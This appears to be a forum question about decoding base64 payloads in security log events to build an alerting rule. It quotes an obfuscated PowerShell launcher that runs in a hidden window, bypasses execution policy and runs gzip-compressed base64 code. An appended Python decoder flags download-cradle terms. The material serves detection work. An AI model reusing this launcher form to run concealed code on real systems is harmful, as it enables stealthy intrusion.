Decode base64 data from events

Hello, everyone. I hope to find an answer here. I have some events with some base64-encoded data within them. I would like to write a rule which will decode the base64 command, in order to create a more complex alerting rule based on the content of that base64 command. Below is an example (only a small part, the encoded part of the event):

Host Application = powershell.exe -nop -w hidden -noni -ep bypass &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

I would like to have a rule which will decode the encoded data in order to create the final alerting rule. I am curious how you can accomplish that? Many thanks in advance!
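One way to do the decoding step, added here as an example and not taken from the poster or from any Splunk answer: a standalone Python decoder of the kind you would wrap in a custom search command, which pulls the FromBase64String argument out of the event, base64-decodes it, inflates the gzip layer the event describes, and then checks the plaintext for analyst-chosen terms. The sample event and its payload are constructed, and the term list is an assumption.

```python
import base64
import gzip
import re
from typing import List, Optional

# Pattern for the base64 argument handed to FromBase64String('...') in the event text.
B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")


def extract_payload(event: str) -> Optional[str]:
    """Return the raw base64 string from the event, or None when there is none."""
    m = B64_RE.search(event)
    return m.group(1) if m else None


def decode_event(event: str) -> Optional[str]:
    """Base64-decode the payload and inflate it if it is gzip, as the GzipStream wrapper implies."""
    payload = extract_payload(event)
    if payload is None:
        return None
    try:
        raw = base64.b64decode(payload, validate=True)
    except ValueError:  # not valid base64: leave the event for the analyst instead of guessing
        return None
    if raw[:2] == b"\x1f\x8b":  # gzip magic bytes
        try:
            raw = gzip.decompress(raw)
        except (OSError, EOFError):  # truncated or corrupt gzip member
            return None
    return raw.decode("utf-8", errors="replace")


def matched_terms(decoded: str, terms=("Invoke-Expression", "DownloadString")) -> List[str]:
    """Case-insensitive check of the decoded script against an assumed, analyst-chosen term list."""
    low = decoded.lower()
    return [t for t in terms if t.lower() in low]


# Constructed sample event with the same shape as the one in the question; the payload is harmless.
_SCRIPT = b"Write-Output 'constructed sample'"
_ENCODED = base64.b64encode(gzip.compress(_SCRIPT)).decode("ascii")
SAMPLE_EVENT = (
    "Host Application = powershell.exe -nop -w hidden -noni -ep bypass "
    "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object "
    "System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,"
    f"[System.Convert]::FromBase64String('{_ENCODED}'))),"
    "[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
)

if __name__ == "__main__":
    print(decode_event(SAMPLE_EVENT))
```

Events whose payload is plain base64 without the gzip layer are returned as-is, so the same function serves both shapes.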
